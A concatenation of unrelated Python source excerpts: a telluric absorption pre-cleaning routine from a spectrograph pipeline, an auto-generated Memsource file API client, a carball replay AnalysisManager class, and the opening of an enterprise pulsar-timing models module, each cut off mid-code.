wavestart = pcheck(params, 'EXT_S1D_WAVESTART', 'wavestart', kwargs,
func_name)
waveend = pcheck(params, 'EXT_S1D_WAVEEND', 'waveend', kwargs, func_name)
dvgrid = pcheck(params, 'EXT_S1D_BIN_UVELO', 'dvgrid', kwargs, func_name)
# ----------------------------------------------------------------------
# get image and header from infile
header = infile.header
# get airmass from header
hdr_airmass = infile.get_key('KW_AIRMASS', dtype=float)
# copy e2ds input image
image_e2ds_ini = np.array(infile.data)
# get shape of the e2ds
nbo, nbpix = image_e2ds_ini.shape
# get wave map for the input e2ds
wave_e2ds = wprops['WAVEMAP']
# ----------------------------------------------------------------------
# define storage of quality control
qc_values, qc_names, qc_logic, qc_pass = [], [], [], []
# need to add dummy values for these qc
# 1. snr < snr_min_thres (pos = 0)
qc_values.append(np.nan)
qc_names.append('EXTSNR')
qc_logic.append('EXTSNR < {0}'.format(snr_min_thres))
qc_pass.append(np.nan)
# 2. ccf is NaN (pos = 1)
qc_values.append(np.nan)
qc_names.append('NUM_NAN_CCF')
qc_logic.append('NUM_NAN_CCF > 0')
qc_pass.append(np.nan)
# 3. exponent for others out of bounds (pos = 2 and 3)
qc_values += [np.nan, np.nan]
qc_names += ['EXPO_OTHERS L', 'EXPO_OTHERS U']
qc_logic += ['EXPO_OTHERS L < {0}'.format(others_bounds[0]),
'EXPO_OTHERS U > {0}'.format(others_bounds[1])]
qc_pass += [np.nan, np.nan]
# 4. exponent for water out of bounds (pos 4 and 5)
qc_values += [np.nan, np.nan]
qc_names += ['EXPO_WATER L', 'EXPO_WATER U']
qc_logic += ['EXPO_WATER L < {0}'.format(water_bounds[0]),
'EXPO_WATER U > {0}'.format(water_bounds[1])]
qc_pass += [np.nan, np.nan]
# 5. max iterations exceeded (pos = 6)
qc_values.append(np.nan)
qc_names.append('ITERATIONS')
qc_logic.append('ITERATIONS = {0}'.format(max_iterations - 1))
qc_pass.append(np.nan)
# dev note: if adding a new one must add tfailmsgs for all uses in qc
# (mk_tellu and fit_tellu)
# ----------------------------------------------------------------------
# remove OH lines if required
if clean_ohlines:
image_e2ds, sky_model = clean_ohline_pca(params, image_e2ds_ini,
wave_e2ds)
# else just copy the image and set the sky model to zeros
else:
image_e2ds = np.array(image_e2ds_ini)
sky_model = np.zeros_like(image_e2ds_ini)
# ----------------------------------------------------------------------
if not do_precleaning:
# log progress
WLOG(params, '', TextEntry('10-019-00008'))
# populate qc params
qc_params = [qc_names, qc_values, qc_logic, qc_pass]
# populate parameter dictionary
props = ParamDict()
props['CORRECTED_E2DS'] = image_e2ds
props['TRANS_MASK'] = np.ones_like(image_e2ds_ini).astype(bool)
props['ABSO_E2DS'] = np.ones_like(image_e2ds_ini)
props['SKY_MODEL'] = sky_model
props['EXPO_WATER'] = np.nan
props['EXPO_OTHERS'] = np.nan
props['DV_WATER'] = np.nan
props['DV_OTHERS'] = np.nan
props['CCFPOWER_WATER'] = np.nan
props['CCFPOWER_OTHERS'] = np.nan
props['QC_PARAMS'] = qc_params
# set sources
keys = ['CORRECTED_E2DS', 'TRANS_MASK', 'ABSO_E2DS', 'EXPO_WATER',
'EXPO_OTHERS', 'DV_WATER', 'DV_OTHERS', 'CCFPOWER_WATER',
'CCFPOWER_OTHERS', 'QC_PARAMS', 'SKY_MODEL']
props.set_sources(keys, func_name)
# ------------------------------------------------------------------
# add constants used (can come from kwargs)
props['TELLUP_DO_PRECLEANING'] = do_precleaning
props['TELLUP_D_WATER_ABSO'] = default_water_abso
props['TELLUP_CCF_SCAN_RANGE'] = ccf_scan_range
props['TELLUP_CLEAN_OH_LINES'] = clean_ohlines
props['TELLUP_REMOVE_ORDS'] = remove_orders
props['TELLUP_SNR_MIN_THRES'] = snr_min_thres
props['TELLUP_DEXPO_CONV_THRES'] = dexpo_thres
props['TELLUP_DEXPO_MAX_ITR'] = max_iterations
props['TELLUP_ABSO_EXPO_KWID'] = ker_width
props['TELLUP_ABSO_EXPO_KEXP'] = ker_shape
props['TELLUP_TRANS_THRES'] = trans_thres
props['TELLUP_TRANS_SIGLIM'] = trans_siglim
props['TELLUP_FORCE_AIRMASS'] = force_airmass
props['TELLUP_OTHER_BOUNDS'] = others_bounds
props['TELLUP_WATER_BOUNDS'] = water_bounds
props['TELLUP_ABSO_EXPO_KTHRES'] = ker_thres
props['TELLUP_WAVE_START'] = wavestart
props['TELLUP_WAVE_END'] = waveend
props['TELLUP_DVGRID'] = dvgrid
# set sources
keys = ['TELLUP_D_WATER_ABSO', 'TELLUP_CCF_SCAN_RANGE',
'TELLUP_CLEAN_OH_LINES', 'TELLUP_REMOVE_ORDS',
'TELLUP_SNR_MIN_THRES', 'TELLUP_DEXPO_CONV_THRES',
'TELLUP_DEXPO_MAX_ITR', 'TELLUP_ABSO_EXPO_KWID',
'TELLUP_ABSO_EXPO_KEXP', 'TELLUP_TRANS_THRES',
'TELLUP_TRANS_SIGLIM', 'TELLUP_FORCE_AIRMASS',
'TELLUP_OTHER_BOUNDS', 'TELLUP_WATER_BOUNDS',
'TELLUP_ABSO_EXPO_KTHRES', 'TELLUP_WAVE_START',
'TELLUP_WAVE_END', 'TELLUP_DVGRID', 'TELLUP_DO_PRECLEANING']
props.set_sources(keys, func_name)
# ------------------------------------------------------------------
# return props
return props
# ----------------------------------------------------------------------
# we ravel the wavelength grid to make it a 1d array of increasing
# wavelength. We will trim the overlapping domain between orders
keep = np.ones_like(wave_e2ds).astype(bool)
# keep track of where orders are
orders, _ = np.indices(wave_e2ds.shape)
# loop around 2nd to last-1 order and compare -1th and +1th order
for order_num in range(1, nbo - 1):
# get wavelengths not in order beforetellu_preclean
before = wave_e2ds[order_num] > wave_e2ds[order_num - 1][::-1]
# get wavelengths not in order after
after = wave_e2ds[order_num] < wave_e2ds[order_num + 1][::-1]
# combine mask
keep[order_num] = before & after
# set whole first order to zeros (rejected)
keep[0] = np.zeros(nbpix).astype(bool)
# set whole last order to zeros (rejected)
keep[-1] = np.zeros(nbpix).astype(bool)
# ----------------------------------------------------------------------
# force into 1D and apply keep map
flatkeep = keep.ravel()
wavemap = wave_e2ds.ravel()[flatkeep]
spectrum = image_e2ds.ravel()[flatkeep]
spectrum_ini = image_e2ds_ini.ravel()[flatkeep]
orders = orders.ravel()[flatkeep]
# ----------------------------------------------------------------------
# load tapas in correct format
spl_others, spl_water = load_tapas_spl(params, recipe, header)
# ----------------------------------------------------------------------
# load the snr from e2ds file
snr = infile.read_header_key_1d_list('KW_EXT_SNR', nbo, dtype=float)
# remove infinite / NaN snr
snr[~np.isfinite(snr)] = 0.0
# remove snr from these orders (due to thermal background)
for order_num in remove_orders:
snr[order_num] = 0.0
# make sure we have at least one order above the min snr requiredment
if np.nanmax(snr) < snr_min_thres:
# update qc params
qc_values[0] = np.nanmax(snr)
qc_pass[0] = 0
qc_params = [qc_names, qc_values, qc_logic, qc_pass]
# return qc_exit_tellu_preclean
return qc_exit_tellu_preclean(params, recipe, image_e2ds, infile,
wave_e2ds, qc_params, sky_model)
else:
qc_values[0] = np.nanmax(snr)
qc_pass[0] = 1
# mask all orders below min snr
for order_num in range(nbo):
# only mask if snr below threshold
if snr[order_num] < snr_min_thres:
# find order mask (we only want to remove values in this order
order_mask = orders == order_num
# apply low snr mask to spectrum
spectrum[order_mask] = np.nan
# for numerical stabiility, remove NaNs. Setting to zero biases a bit
# the CCF, but this should be OK after we converge
spectrum[~np.isfinite(spectrum)] = 0.0
spectrum[spectrum < 0.0] = 0.0
# ----------------------------------------------------------------------
# scanning range for the ccf computations
drange = np.arange(-ccf_scan_range, ccf_scan_range + 1.0, 1.0)
# get species line lists from file
mask_others, mask_water = get_sp_linelists(params)
# storage for the ccfs
ccf_others = np.zeros_like(drange, dtype=float)
ccf_water = np.zeros_like(drange, dtype=float)
# start with no correction of abso to get the CCF
expo_water = 0.0
# we start at zero to get a velocity mesaurement even if we may force
# to the airmass
expo_others = 0.0
# keep track of consecutive exponents and test convergence
expo_water_prev = np.inf
expo_others_prev = np.inf
dexpo = np.inf
# storage for the amplitude from fit
amp_water_list = []
amp_others_list = []
# storage for the exponential from fit
expo_water_list = []
expo_others_list = []
# storage for plotting
dd_iterations = []
ccf_water_iterations = []
ccf_others_iterations = []
# ----------------------------------------------------------------------
# first guess at the velocity of absoprtion is 0 km/s
dv_abso = 0.0
# set the iteration number
iteration = 0
# just so we have outputs
dv_water, dv_others = np.nan, np.nan
trans = np.ones_like(wavemap)
# set up a qc flag
flag_qc = False
# log progress
WLOG(params, '', TextEntry('40-019-00040'))
# loop around until convergence or 20th iteration
while (dexpo > dexpo_thres) and (iteration < max_iterations):
# set up a qc flag
flag_qc = False
# log progress
args = [iteration, dexpo, expo_water, expo_others, dv_abso * 1000]
WLOG(params, '', TextEntry('40-019-00041', args=args))
# get the absorption spectrum
trans = get_abso_expo(params, wavemap, expo_others, expo_water,
spl_others, spl_water, ww=ker_width,
ex_gau=ker_shape, dv_abso=dv_abso,
ker_thres=ker_thres, wavestart=wavestart,
waveend=waveend, dvgrid=dvgrid)
# divide spectrum by transmission
spectrum_tmp = spectrum / trans
# ------------------------------------------------------------------
# only keep valid pixels (non NaNs)
valid = np.isfinite(spectrum_tmp)
# transmission with the exponent value
valid &= (trans > np.exp(trans_thres))
# ------------------------------------------------------------------
# apply some cuts to very discrepant points. These will be set to zero
# not to bias the CCF too much
cut = np.nanmedian(np.abs(spectrum_tmp)) * trans_siglim
# set NaN and infinite values to zero
spectrum_tmp[~np.isfinite(spectrum_tmp)] = 0.0
# apply cut and set values to zero
spectrum_tmp[spectrum_tmp > cut] = 0.0
# set negative values to zero
spectrum_tmp[spectrum_tmp < 0.0] = 0.0
# ------------------------------------------------------------------
# get the CCF of the test spectrum
# first spline onto the wave grid
spline = mp.iuv_spline(wavemap[valid], spectrum_tmp[valid], k=1, ext=1)
# loop around all scanning points in d
for d_it in range(len(drange)):
# computer rv scaling factor
scaling = (1 + drange[d_it] / speed_of_light)
# we compute the ccf_others all the time, even when forcing the
# airmass, just to look at its structure and potential residuals
# compute for others
lothers = np.array(mask_others['ll_mask_s']) * scaling
tmp_others = spline(lothers) * np.array(mask_others['w_mask'])
ccf_others[d_it] = np.nanmean(tmp_others[tmp_others != 0.0])
# computer for water
lwater = np.array(mask_water['ll_mask_s']) * scaling
tmp_water = spline(lwater) * mask_water['w_mask']
ccf_water[d_it] = np.nanmean(tmp_water[tmp_water != 0.0])
# ------------------------------------------------------------------
# subtract the median of the ccf outside the | |
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:<EMAIL>>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class FileApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_url_file(self, body, content_disposition, **kwargs): # noqa: E501
"""Upload file # noqa: E501
Accepts multipart/form-data, application/octet-stream or application/json. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_url_file(body, content_disposition, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RemoteUploadedFileDto body: file (required)
:param str content_disposition: must match pattern `filename\\*=UTF-8''(.+)` (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_url_file_with_http_info(body, content_disposition, **kwargs) # noqa: E501
else:
(data) = self.create_url_file_with_http_info(body, content_disposition, **kwargs) # noqa: E501
return data
def create_url_file_with_http_info(self, body, content_disposition, **kwargs): # noqa: E501
"""Upload file # noqa: E501
Accepts multipart/form-data, application/octet-stream or application/json. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_url_file_with_http_info(body, content_disposition, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RemoteUploadedFileDto body: file (required)
:param str content_disposition: must match pattern `filename\\*=UTF-8''(.+)` (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'content_disposition'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_url_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_url_file`") # noqa: E501
# verify the required parameter 'content_disposition' is set
if ('content_disposition' not in params or
params['content_disposition'] is None):
raise ValueError("Missing the required parameter `content_disposition` when calling `create_url_file`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'content_disposition' in params:
header_params['Content-Disposition'] = params['content_disposition'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/octet-stream', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/files', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UploadedFileDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deletes_file(self, file_uid, **kwargs): # noqa: E501
"""Delete file # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_file(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deletes_file_with_http_info(file_uid, **kwargs) # noqa: E501
else:
(data) = self.deletes_file_with_http_info(file_uid, **kwargs) # noqa: E501
return data
def deletes_file_with_http_info(self, file_uid, **kwargs): # noqa: E501
"""Delete file # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_file_with_http_info(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_uid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deletes_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_uid' is set
if ('file_uid' not in params or
params['file_uid'] is None):
raise ValueError("Missing the required parameter `file_uid` when calling `deletes_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'file_uid' in params:
path_params['fileUid'] = params['file_uid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/files/{fileUid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_file_json(self, file_uid, **kwargs): # noqa: E501
"""Get file # noqa: E501
Get uploaded file as <b>octet-stream</b> or as <b>json</b> based on 'Accept' header # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_file_json(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_file_json_with_http_info(file_uid, **kwargs) # noqa: E501
else:
(data) = self.get_file_json_with_http_info(file_uid, **kwargs) # noqa: E501
return data
def get_file_json_with_http_info(self, file_uid, **kwargs): # noqa: E501
"""Get file # noqa: E501
Get uploaded file as <b>octet-stream</b> or as <b>json</b> based on 'Accept' header # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_file_json_with_http_info(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_uid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_file_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_uid' is set
if ('file_uid' not in params or
params['file_uid'] is None):
raise ValueError("Missing the required parameter `file_uid` when calling `get_file_json`") # noqa: E501
collection_formats = {}
path_params = {}
if 'file_uid' in params:
path_params['fileUid'] = params['file_uid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/files/{fileUid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UploadedFileDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_files(self, **kwargs): # noqa: E501
"""List files # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_files(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:param str name:
:param list[str] types:
:param int created_by:
:param int bigger_than: Size in bytes
:return: PageDtoUploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_files_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_files_with_http_info(**kwargs) # noqa: E501
return data
def get_files_with_http_info(self, **kwargs): # noqa: E501
"""List files # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_files_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:param str name:
:param list[str] types:
:param int created_by:
:param int bigger_than: Size in bytes
:return: | |
import logging
import time
from typing import Dict, Callable, Union
import pandas as pd
import json
import os
import gzip
from google.protobuf.json_format import _Printer
from typing.io import IO
from .utils.json_encoder import CarballJsonEncoder
script_path = os.path.abspath(__file__)
with open(os.path.join(os.path.dirname(script_path), 'PROTOBUF_VERSION'), 'r') as f:
PROTOBUF_VERSION = json.loads(f.read())
from ..analysis.cleaner.cleaner import clean_replay
from ..analysis.saltie_game.metadata.ApiGame import ApiGame
from ..analysis.saltie_game.metadata.ApiMutators import ApiMutators
from ..analysis.saltie_game.metadata.ApiPlayer import ApiPlayer
from ..analysis.saltie_game.metadata.ApiTeam import ApiTeam
from ..analysis.saltie_game.saltie_game import SaltieGame
from ..analysis.stats.stats_manager import StatsManager
from ..analysis.utils.pandas_manager import PandasManager
from ..analysis.utils.proto_manager import ProtobufManager
from ..generated.api import game_pb2
from ..generated.api.player_pb2 import Player
from ..json_parser.game import Game
from ..analysis.events.event_creator import EventsCreator
logger = logging.getLogger(__name__)
class AnalysisManager:
"""
AnalysisManager class takes an initialized Game object and converts the data into a Protobuf and a DataFrame. Then,
that data is used to perform full analysis on the replay.
"""
id_creator = None
timer = None
def __init__(self, game: Game):
self.game = game
self.protobuf_game = game_pb2.Game()
self.protobuf_game.version = PROTOBUF_VERSION
self.id_creator = self._create_player_id_function(game)
self.stats_manager = StatsManager()
self.events_creator = EventsCreator(self.id_creator)
self.should_store_frames = False
self.df_bytes = None
def create_analysis(self, calculate_intensive_events: bool = False, clean: bool = True):
"""
Sets basic metadata, and decides whether analysis can be performed and then passes required parameters
to perform_full_analysis(...); After, stores the DataFrame.
:param calculate_intensive_events: Indicates if expensive calculations should run to include additional stats.
:param clean: Indicates if useless/invalid data should be found and removed.
"""
self._start_time()
player_map = self._get_game_metadata(self.game, self.protobuf_game)
self._log_time("Getting in-game frame-by-frame data...")
data_frame = self._initialize_data_frame(self.game)
self._log_time("Getting important frames (kickoff, first-touch)...")
kickoff_frames, first_touch_frames = self._get_kickoff_frames(self.game, self.protobuf_game, data_frame)
self._log_time("Setting game kickoff frames...")
self.game.kickoff_frames = kickoff_frames
if self._can_do_full_analysis(first_touch_frames):
self._perform_full_analysis(self.game, self.protobuf_game, player_map,
data_frame, kickoff_frames, first_touch_frames,
calculate_intensive_events=calculate_intensive_events,
clean=clean)
else:
self._log_time("Cannot perform analysis: invalid analysis.")
self.protobuf_game.game_metadata.is_invalid_analysis = True
# log before we add the dataframes
# logger.debug(self.protobuf_game)
self._store_frames(data_frame)
def write_json_out_to_file(self, file: IO):
"""
Writes the json data to the specified file, as text.
NOTES:
The data is written as text (i.e. string), and the buffer mode must be 'w'.
E.g. open(file_name, 'w')
:param file: The file object (or a buffer).
"""
if 'b' in file.mode:
raise IOError("Json files can not be binary use open(path,\"w\")")
printer = _Printer()
js = printer._MessageToJsonObject(self.protobuf_game)
json.dump(js, file, indent=2, cls=CarballJsonEncoder)
def write_proto_out_to_file(self, file: IO):
"""
Writes the proto buffer data to the specified file, as bytes.
NOTES:
The data is written as bytes (i.e. in binary), and the buffer mode must be 'wb'.
E.g. open(file_name, 'wb')
The file will NOT be human-readable.
:param file: The file object (or a buffer).
"""
if 'b' not in file.mode:
raise IOError("Proto files must be binary use open(path,\"wb\")")
ProtobufManager.write_proto_out_to_file(file, self.protobuf_game)
def write_pandas_out_to_file(self, file: Union[IO, gzip.GzipFile]):
"""
Writes the pandas data to the specified file, as bytes. File may be a GzipFile object to compress the data
frame.
NOTES:
The data is written as bytes (i.e. in binary), and the buffer mode must be 'wb'.
E.g. gzip.open(file_name, 'wb')
The file will NOT be human-readable.
:param file: The file object (or a buffer).
"""
if isinstance(file.mode, str) and 'b' not in file.mode:
raise IOError("Data frame files must be binary use open(path,\"wb\")")
if isinstance(file.mode, int) and file.mode != gzip.WRITE:
raise IOError("Gzip compressed data frame files must be opened in WRITE mode.")
if self.df_bytes is not None:
file.write(self.df_bytes)
elif not self.should_store_frames:
logger.warning("pd DataFrames are not being stored anywhere")
def get_protobuf_data(self) -> game_pb2.Game:
"""
:return: The protobuf data created by the analysis
USAGE: A Protocol Buffer contains in-game metadata (e.g. events, stats). Treat it as a usual Python object with
fields that match the API.
INFO: The Protocol Buffer is a collection of data organized in a format similar to json. All relevant .proto
files found at https://github.com/SaltieRL/carball/tree/master/api.
Google's developer guide to protocol buffers may be found at https://developers.google.com/protocol-buffers/docs/overview
"""
return self.protobuf_game
def get_json_data(self):
"""
:return: The protobuf data created by the analysis as a json object.
see get_protobuf_data for more details.
The json fields are defined by https://github.com/SaltieRL/carball/tree/master/api
"""
printer = _Printer()
js = printer._MessageToJsonObject(self.protobuf_game)
return js
def get_data_frame(self) -> pd.DataFrame:
"""
:return: The pandas.DataFrame object.
USAGE: A DataFrame contains in-game frame-by-frame data.
INFO: The DataFrame is a collection of data organized in a format similar to csv. The 'index' column of the
DataFrame is the consecutive in-game frames, and all other column headings (150+) are tuples in the following
format:
(Object, Data), where the Object is either a player, the ball or the game.
All column information (and keys) may be seen by calling data_frame.info(verbose=True)
All further documentation about the DataFrame can be found at https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html
"""
return self.data_frame
def _perform_full_analysis(self, game: Game, proto_game: game_pb2.Game, player_map: Dict[str, Player],
data_frame: pd.DataFrame, kickoff_frames: pd.DataFrame, first_touch_frames: pd.Series,
calculate_intensive_events: bool = False, clean: bool = True):
"""
Sets some further data and cleans the replay;
Then, performs the analysis.
:param game: The game object (instance of Game). It contains the replay metadata and processed json data.
:param proto_game: The game's protobuf (instance of game_pb2) (refer to the comment in get_protobuf_data() for more info).
:param data_frame: The game's pandas.DataFrame object (refer to comment in get_data_frame() for more info).
:param player_map: A map of player name to Player protobuf.
:param kickoff_frames: Contains data about the kickoffs.
:param first_touch_frames: Contains data for frames where touches can actually occur.
:param calculate_intensive_events: Indicates if expensive calculations should run to include additional stats.
:param clean: Indicates if useless/invalid data should be found and removed.
"""
self._get_game_time(proto_game, data_frame)
if clean:
clean_replay(game, data_frame, proto_game, player_map)
self._log_time("Creating events...")
self.events_creator.create_events(game, proto_game, player_map, data_frame, kickoff_frames, first_touch_frames,
calculate_intensive_events=calculate_intensive_events)
self._log_time("Getting stats...")
self._get_stats(game, proto_game, player_map, data_frame)
def _get_game_metadata(self, game: Game, proto_game: game_pb2.Game) -> Dict[str, Player]:
"""
Processes protobuf data and sets the respective object fields to correct values.
Maps the player's specific online ID (steam unique ID) to the player object.
:param game: The game object (instance of Game). It contains the replay metadata and processed json data.
:param proto_game: The game's protobuf (instance of game_pb2) (refer to the comment in get_protobuf_data() for more info).
:return: A dictionary, with the player's online ID as the key, and the player object (instance of Player) as the value.
"""
# Process the relevant protobuf data and pass it to the Game object (returned data is ignored).
ApiGame.create_from_game(proto_game.game_metadata, game, self.id_creator)
# Process the relevant protobuf data and pass it to the Game object's mutators (returned data is ignored).
ApiMutators.create_from_game(proto_game.mutators, game, self.id_creator)
# Process the relevant protobuf data and pass it to the Team objects (returned data is ignored).
ApiTeam.create_teams_from_game(game, proto_game, self.id_creator)
# Process the relevant protobuf data and add players to their respective parties.
ApiGame.create_parties(proto_game.parties, game, self.id_creator)
player_map = dict()
for player in game.players:
player_proto = proto_game.players.add()
ApiPlayer.create_from_player(player_proto, player, self.id_creator)
player_map[player.online_id] = player_proto
return player_map
def _get_game_time(self, protobuf_game: game_pb2.Game, data_frame: pd.DataFrame):
"""
Calculates the game length (total time the game lasted) and sets it to the relevant metadata length field.
Calculates the total time a player has spent in the game and sets it to the relevant player field.
:param proto_game: The game's protobuf (instance of game_pb2) (refer to the comment in get_protobuf_data() for more info).
:param data_frame: The game's pandas.DataFrame object (refer to comment in get_data_frame() for more info).
"""
protobuf_game.game_metadata.length = data_frame.game[data_frame.game.goal_number.notnull()].delta.sum()
for player in protobuf_game.players:
try:
player.time_in_game = data_frame[
data_frame[player.name].pos_x.notnull() & data_frame.game.goal_number.notnull()].game.delta.sum()
player.first_frame_in_game = data_frame[player.name].pos_x.first_valid_index()
except:
player.time_in_game = 0
logger.info("Set each player's in-game times.")
def _get_kickoff_frames(self, game: Game, proto_game: game_pb2.Game, data_frame: pd.DataFrame):
"""
Firstly, fetches kickoff-related data from SaltieGame.
Secondly, checks for edge-cases and corrects errors.
NOTE: kickoff_frames is an array of all in-game frames at each kickoff beginning.
NOTE: first_touch_frames is an array of all in-game frames for each 'First Touch' at kickoff.
:param game: The game object (instance of Game). It contains the replay metadata and processed json data.
:param proto_game: The game's protobuf (instance of game_pb2) (refer to the comment in get_protobuf_data() for more info).
:param data_frame: The game's pandas.DataFrame object (refer to comment in get_data_frame() for more info).
:return: See notes above.
"""
kickoff_frames = SaltieGame.get_kickoff_frames(game)
first_touch_frames = SaltieGame.get_first_touch_frames(game)
if len(kickoff_frames) > len(first_touch_frames):
# happens when the game ends before anyone touches the ball at kickoff
kickoff_frames = kickoff_frames[:len(first_touch_frames)]
for | |
<filename>utils/models.py
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import numpy as np
from enterprise.signals import parameter
from enterprise.signals import selections
from enterprise.signals import signal_base
from enterprise.signals import white_signals
from enterprise.signals import gp_signals
from enterprise.signals import deterministic_signals
from enterprise.signals import utils
from enterprise import constants as const
#### Model component building blocks ####
@signal_base.function
def free_spectrum(f, log10_rho=None):
"""
Free spectral model. PSD amplitude at each frequency
is a free parameter. Model is parameterized by
S(f_i) = \rho_i^2 * T,
where \rho_i is the free parameter and T is the observation
length.
"""
return np.repeat(10**(2*log10_rho), 2)
# linear interpolation basis in time with nu^-2 scaling
@signal_base.function
def linear_interp_basis_dm(toas, freqs, dt=30*const.day):
# get linear interpolation basis in time
U, avetoas = utils.linear_interp_basis(toas, dt=dt)
# scale with radio frequency
Dm = (1400/freqs)**2
return U * Dm[:, None], avetoas
# linear interpolation in radio frequcny
@signal_base.function
def linear_interp_basis_freq(freqs, df=64):
return utils.linear_interp_basis(freqs, dt=df)
# DMX-like signal with Gaussian prior
@signal_base.function
